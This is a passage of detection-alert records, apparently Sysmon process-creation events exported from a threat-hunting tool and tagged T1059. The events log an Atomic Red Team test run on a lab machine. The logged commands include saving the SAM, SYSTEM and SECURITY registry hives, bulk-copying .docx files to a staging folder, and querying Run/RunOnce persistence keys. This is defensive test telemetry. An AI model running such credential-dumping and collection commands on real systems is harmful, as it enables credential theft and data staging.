[T1059] Command-Line Interface,1563547792.275626,2019-07-19T18:49:52.275626+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;for /R c: %%f in (*.docx) do copy %%f c:\temp\&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:49:52.210871Z"">
</TimeCreated>
<EventRecordID>3727</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:49:52.202</Data>
<Data Name=""ProcessGuid"">747F3D96-D890-5D31-0000-0010FA3F3200</Data>
<Data Name=""ProcessId"">1568</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;for /R c: %%f in (*.docx) do copy %%f c:\temp\&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547792.053916,2019-07-19T18:49:52.053916+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /S /D /c&quot; dir c: /b /s .docx &quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:49:52.048002Z"">
</TimeCreated>
<EventRecordID>3725</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:49:52.011</Data>
<Data Name=""ProcessGuid"">747F3D96-D890-5D31-0000-001012383200</Data>
<Data Name=""ProcessId"">608</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">C:\Windows\system32\cmd.exe /S /D /c&quot; dir c: /b /s .docx &quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D88F-5D31-0000-0010BD353200</Data>
<Data Name=""ParentProcessId"">2780</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;dir c: /b /s .docx | findstr /e .docx&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547792.048002,2019-07-19T18:49:52.048002+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;dir c: /b /s .docx | findstr /e .docx&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:49:51.996250Z"">
</TimeCreated>
<EventRecordID>3724</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:49:51.971</Data>
<Data Name=""ProcessGuid"">747F3D96-D88F-5D31-0000-0010BD353200</Data>
<Data Name=""ProcessId"">2780</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;dir c: /b /s .docx | findstr /e .docx&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547791.99625,2019-07-19T18:49:51.996250+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:49:43.569071Z"">
</TimeCreated>
<EventRecordID>3723</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:49:43.520</Data>
<Data Name=""ProcessGuid"">747F3D96-D887-5D31-0000-0010D51F3200</Data>
<Data Name=""ProcessId"">752</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547781.691049,2019-07-19T18:49:41.691049+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg save HKLM\SAM sam.hive&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:49:41.660271Z"">
</TimeCreated>
<EventRecordID>3721</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:49:41.646</Data>
<Data Name=""ProcessGuid"">747F3D96-D885-5D31-0000-00107F1A3200</Data>
<Data Name=""ProcessId"">2832</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg save HKLM\SAM sam.hive&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547779.255338,2019-07-19T18:49:39.255338+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg save HKLM\System system.hive&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:49:39.229170Z"">
</TimeCreated>
<EventRecordID>3719</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:49:39.214</Data>
<Data Name=""ProcessGuid"">747F3D96-D883-5D31-0000-0010839B3100</Data>
<Data Name=""ProcessId"">3904</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg save HKLM\System system.hive&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547773.63255,2019-07-19T18:49:33.632550+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg save HKLM\Security security.hive&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:49:33.619257Z"">
</TimeCreated>
<EventRecordID>3717</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:49:33.603</Data>
<Data Name=""ProcessGuid"">747F3D96-D87D-5D31-0000-0010958F3100</Data>
<Data Name=""ProcessId"">1728</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg save HKLM\Security security.hive&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547773.572021,2019-07-19T18:49:33.572021+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:49:33.559318Z"">
</TimeCreated>
<EventRecordID>3715</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:49:33.541</Data>
<Data Name=""ProcessGuid"">747F3D96-D87D-5D31-0000-0010FA8A3100</Data>
<Data Name=""ProcessId"">3868</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547773.392501,2019-07-19T18:49:33.392501+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:49:33.375717Z"">
</TimeCreated>
<EventRecordID>3713</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:49:33.365</Data>
<Data Name=""ProcessGuid"">747F3D96-D87D-5D31-0000-0010CA843100</Data>
<Data Name=""ProcessId"">3900</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547773.331942,2019-07-19T18:49:33.331942+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:49:33.303358Z"">
</TimeCreated>
<EventRecordID>3711</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:49:33.284</Data>
<Data Name=""ProcessGuid"">747F3D96-D87D-5D31-0000-00103B803100</Data>
<Data Name=""ProcessId"">324</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547773.251689,2019-07-19T18:49:33.251689+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:49:33.225776Z"">
</TimeCreated>
<EventRecordID>3709</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:49:33.209</Data>
<Data Name=""ProcessGuid"">747F3D96-D87D-5D31-0000-0010B37B3100</Data>
<Data Name=""ProcessId"">3616</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
